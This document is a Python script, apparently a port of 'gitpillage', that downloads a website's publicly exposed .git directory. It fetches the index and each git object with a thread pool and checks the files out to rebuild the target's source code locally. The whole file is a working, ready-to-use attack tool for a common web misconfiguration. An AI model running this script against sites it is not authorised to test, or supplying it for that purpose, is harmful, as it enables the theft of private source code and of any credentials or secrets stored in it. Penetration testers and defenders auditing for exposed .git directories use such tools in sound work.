#!/usr/bin/python3


# inspired by https://github.com/koto/gitpillage/blob/master/gitpillage.sh
# example: python3 gitpillage.py -u https://www.example.com -t 10

#
### functions
#
def downloadFile( url ):
    """
    Fetch `url` with an HTTP GET, using a timeout of 3.

    Returns the `requests` response object whatever its status code, or
    False when the request raised (the error is then printed in red on stdout).
    """
    try:
        response = requests.get( url, timeout=3 )
    except Exception as e:
        sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
        return False
    else:
        return response


def downloadOject( t_extension, t_exclude, file ):
    """
    Download one git object and check the matching file out of the local repository.

    Worker run by the thread pool. It relies on the module-level `t_multiproc`
    (progress counters and verbose flag), `git_url` and `output_dir`.

    t_extension -- extensions to download; when non-empty, any other extension is skipped
    t_exclude   -- extensions that are never downloaded
    file        -- one "object_id:path" entry built from `git ls-files --stage`

    Returns True when the file has been checked out. Returns False when the
    entry is empty or malformed, filtered out by extension, or when the
    download, the local save or the checkout failed.
    """
    # NOTE: the counters are updated by several threads without a lock, so the
    # progress display is only approximate.
    sys.stdout.write( 'progress: %d/%d\r' %  (t_multiproc['n_current'],t_multiproc['n_total']) )
    t_multiproc['n_current'] += 1

    file = file.strip()
    if not file:
        return False

    # split on the first ':' only, the path itself may contain colons
    object_id, sep, real_filename = file.partition(':')
    if not sep or not object_id or not real_filename:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[*] skip malformed entry: %s%s\n" % (fg('dark_gray'),file,attr(0)) )
        return False

    # a name without any dot is its own "extension"
    ext = real_filename.rsplit('.', 1)[-1]

    # everything is downloaded by default; the include list narrows the
    # selection and the exclude list always wins
    go = True
    if t_extension:
        go = ext in t_extension
    if t_exclude and ext in t_exclude:
        go = False

    if not go:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[*] skip extension: %s%s\n" % (fg('dark_gray'),real_filename,attr(0)) )
        return False

    # loose objects are stored as objects/<first 2 chars>/<remaining chars>
    u = git_url + '/objects/' + object_id[0:2] + '/' + object_id[2:]
    r = downloadFile( u )

    # downloadFile() returns False when the request itself failed
    if isinstance(r, bool):
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[-] %s%s\n" % (fg('dark_gray'),u,attr(0)) )
        return False

    if r.status_code != 200:
        if t_multiproc['verbose']:
            sys.stdout.write( "%s[-] %s (%d)%s\n" % (fg('dark_gray'),u,r.status_code,attr(0)) )
        return False

    # saveObject() reports its own error, nothing to check out if it failed
    if not saveObject( output_dir, object_id, r.content ):
        return False

    try:
        # The path comes from the remote index and is therefore untrusted:
        # pass it as a single argument (no shell), after '--' so it cannot be
        # read as an option, and with literal pathspecs so that wildcard
        # characters are not interpreted. cwd= replaces the former "cd ...;"
        # which still ran git in the current directory when the cd failed.
        subprocess.check_output(
            ['git', '--literal-pathspecs', 'checkout', '--', real_filename],
            cwd=output_dir,
            stderr=subprocess.STDOUT
        )
    except (subprocess.CalledProcessError, OSError) as e:
        if t_multiproc['verbose']:
            sys.stdout.write( "[-] %s (%d) %s-> %s%s\n" % (u,r.status_code,fg('yellow'),e,attr(0)) )
        return False

    t_multiproc['n_success'] += 1
    local_path = output_dir + '/' + real_filename
    sys.stdout.write( "[+] %s (%d) %s-> %s (%d)%s\n" % (u,r.status_code,fg('cyan'),local_path,len(r.content),attr(0)) )
    return True


def saveObject( output_dir, object_id, content ):
    """
    Store a downloaded git object inside the local repository.

    output_dir -- root of the local repository (the directory containing .git)
    object_id  -- object id; its first 2 characters name the sub-directory,
                  the remaining ones name the file
    content    -- raw bytes to write

    Returns the path of the written file, or False when the directory or the
    file could not be written (the error is printed in red on stdout).
    """
    dirname = output_dir + '/.git/objects/'+ object_id[0:2]
    filename = dirname + '/' + object_id[2:]

    try:
        # exist_ok: several worker threads may need the same sub-directory at
        # the same time, losing that race must not be reported as a failure
        os.makedirs( dirname, exist_ok=True )
        with open( filename, 'wb' ) as fp:
            fp.write( content )
    except OSError as e:
        sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
        return False

    return filename
#
###
#


import os
import sys
import argparse
import requests
import subprocess
from functools import partial
from urllib.parse import urlparse
from colored import fg, bg, attr
from multiprocessing.dummy import Pool


#
### variables
#
# defaults, overridden by the command line options below
max_threads = 5
t_extension = []
t_exclude = ['png','gif','jpg','jpeg','ico','svg','eot','otf','ttf','woff','woff2','css','less','po','mo','mp3','mp4','mpeg','avi']

parser = argparse.ArgumentParser()
parser.add_argument( "-u","--url",help="url of the .git, but without the .git directory" )
parser.add_argument( "-t","--threads",help="threads, default: 5" )
parser.add_argument( "-e","--extension",help="extensions to download separated by comma, overwrite --exclude, default: all but default exclude" )
parser.add_argument( "-x","--exclude",help="extensions to exclude separated by comma, default: "+','.join(t_exclude) )
parser.add_argument( "-v","--verbose",help="verbose mode, default: off", action="store_true" )
args = parser.parse_args()

# parser.error() prints the usage and exits
if not args.url:
    parser.error( 'url list missing' )
url = args.url.strip('/')

if args.threads:
    # reject bad values here with a usage message instead of a traceback
    # (non numeric value) or a late failure when the pool is created (0 or less)
    try:
        max_threads = int(args.threads)
    except ValueError:
        parser.error( 'threads must be an integer' )
    if max_threads < 1:
        parser.error( 'threads must be greater than 0' )

if args.exclude:
    t_extension = []
    t_exclude = args.exclude.split(',')

# handled after --exclude on purpose: --extension overwrites it
if args.extension:
    t_extension = args.extension.split(',')
    t_exclude = []

# no scheme provided, assume https
if not url.startswith( 'http' ):
    url = 'https://'+url

verbose = args.verbose

git_url = url + '/.git'
t_url_parse = urlparse( url )
# files are restored in a directory named after the target host, created in the current directory
output_dir = os.getcwd() + '/' + t_url_parse.netloc
#
###
#


#
### init
#
# create the output directory (nothing to do when it already exists)
try:
    os.makedirs( output_dir, exist_ok=True )
except OSError as e:
    sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    sys.exit( 1 )

sys.stdout.write( "%s[+] output directory: %s%s\n" % (fg('green'),output_dir,attr(0)) )


# Initialize an empty repository that will receive the downloaded objects.
# git is run with an argument list and cwd= instead of a "cd <dir>; git init"
# shell string: the directory name needs no quoting, and a directory that
# cannot be entered is an error rather than a "git init" of the current directory.
try:
    cmd = ['git', 'init']
    output = subprocess.check_output( cmd, cwd=output_dir, stderr=subprocess.STDOUT ).decode('utf-8', 'replace')
    sys.stdout.write( "[+] %s\n" % output.strip() )
except (subprocess.CalledProcessError, OSError) as e:
    sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
    sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    sys.exit( 1 )
#
###
#


#
### create local repository
#
# fetch the remote index, it lists every tracked file with its object id
u = git_url + '/index'
r = downloadFile( u )
# downloadFile() returns False on a request error; a requests response is
# also falsy when its status code is 4xx/5xx
if not r:
    sys.stdout.write( "%s[-] cannot find index file: %s%s\n" % (fg('red'),u,attr(0)) )
    sys.exit( 1 )
sys.stdout.write( "%s[+] index file found: %s%s\n" % (fg('green'),u,attr(0)) )

with open( output_dir+'/.git/index', 'wb' ) as fp:
    fp.write( r.content )

# Build the list of "object_id:path" entries from the downloaded index.
# The output of git is parsed here rather than through awk so that paths
# containing whitespace are kept whole; -z gives NUL separated, unquoted paths.
try:
    cmd = ['git', 'ls-files', '--stage', '-z']
    output = subprocess.check_output( cmd, cwd=output_dir, stderr=subprocess.STDOUT ).decode('utf-8')
    t_ls_files = []
    for entry in output.split('\0'):
        # entry format: "<mode> <object> <stage>\t<path>"
        meta, tab, path = entry.partition('\t')
        fields = meta.split()
        # entries without a tab (like the empty one after the last NUL) are ignored
        if tab and len(fields) >= 3:
            t_ls_files.append( fields[-2] + ':' + path )
except (subprocess.CalledProcessError, OSError, UnicodeDecodeError) as e:
    sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
    sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    sys.exit( 1 )
#
###
#


#
### main loop
#
# state shared with the workers: progress counters and the verbose flag
t_multiproc = dict(
    n_current=0,
    n_total=len(t_ls_files),
    n_success=0,
    verbose=verbose,
)

# the extension filters are bound once, the pool provides one index entry per call
worker = partial( downloadOject, t_extension, t_exclude )

pool = Pool( max_threads )
pool.map( worker, t_ls_files )
pool.close()
pool.join()
#
###
#


# final summary
summary = "%s[+] %d files successfully downloaded%s\n" % (fg('green'),t_multiproc['n_success'],attr(0))
sys.stdout.write( summary )
